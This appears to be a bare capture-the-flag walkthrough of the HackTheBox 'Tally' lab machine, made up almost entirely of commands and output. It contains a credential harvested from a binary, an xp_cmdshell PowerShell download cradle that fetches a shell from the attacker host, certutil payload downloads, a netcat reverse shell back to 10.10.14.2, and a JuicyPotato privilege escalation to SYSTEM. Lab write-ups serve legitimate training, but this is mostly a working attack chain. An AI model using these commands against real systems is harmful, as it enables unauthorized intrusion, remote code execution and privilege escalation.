HackTheBox Tally

$ nmapAutomator.sh -H 10.10.10.59 -t Full

PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http               Microsoft IIS httpd 10.0
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-09T12:19:03
|_Not valid after:  2051-06-09T12:19:03
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49665/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m09s, deviation: 0s, median: 4m09s
| ms-sql-info:
|   10.10.10.59:1433:
|     Version:
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-09T12:31:01
|_  start_date: 2021-06-09T12:18:38

$ cat ftp/_/User/Sarah/notes.txt
install sharepoint, replace orchard cms

uninstall sql server 2016 (not done yet)

keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

$ smbclient -L //10.10.10.59 -U Finance
        Sharename       Type      Comment
        ---------       ----      -------
        ACCT            Disk
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

$ cat ftp/_/User/Tim/Project/Log/do\ to.txt]
To do:

Remove migration folder
Set secure share permissions

encrypted share creds:

password in keepass

$ smb: \zz_Migration\Binaries\New folder> get tester.exe
$ strings tester.exe | grep db

db: orcharddb
uid: sa
pwd: GWE3V65#6KFH93@4GWTG2G

$ python server and nishang shell and nc -lvnp 1234
sql connection:
$ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell',1
go
reconfigure
go
xp_cmdshell "powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.2/shell.ps1')"
go

PS C:\users\sarah\desktop> ipconfig
Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2

Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\users\sarah\desktop> type user.txt
be72362e8dffeca2b42406d5d1c74bb1

> type "note to tim (draft).txt"
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.

Thanks,
Sarah

PS C:\users\sarah\desktop> type todo.txt
done:

install updates
check windows defender enabled

outstanding:

update intranet design
update server inventory

> whoami /priv
SeImpersonatePrivilege Impersonate a client after authentication Enabled

> certutil -urlcache -f "http://10.10.14.2/nc.exe" nc.exe
> certutil -urlcache -f "http://10.10.14.2/jp.exe" jp.exe

nc -lnvp 1235

.\nc.exe 10.10.14.2 1235 -e cmd.exe

nc -lnvp 1236

jp.exe -l 4321 -p C:\Users\Sarah\Desktop\nc.exe -a "10.10.14.2 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}

C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2

Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

C:\Users\Administrator\Desktop>type root.txt
608bb707348105911c8991108e523eda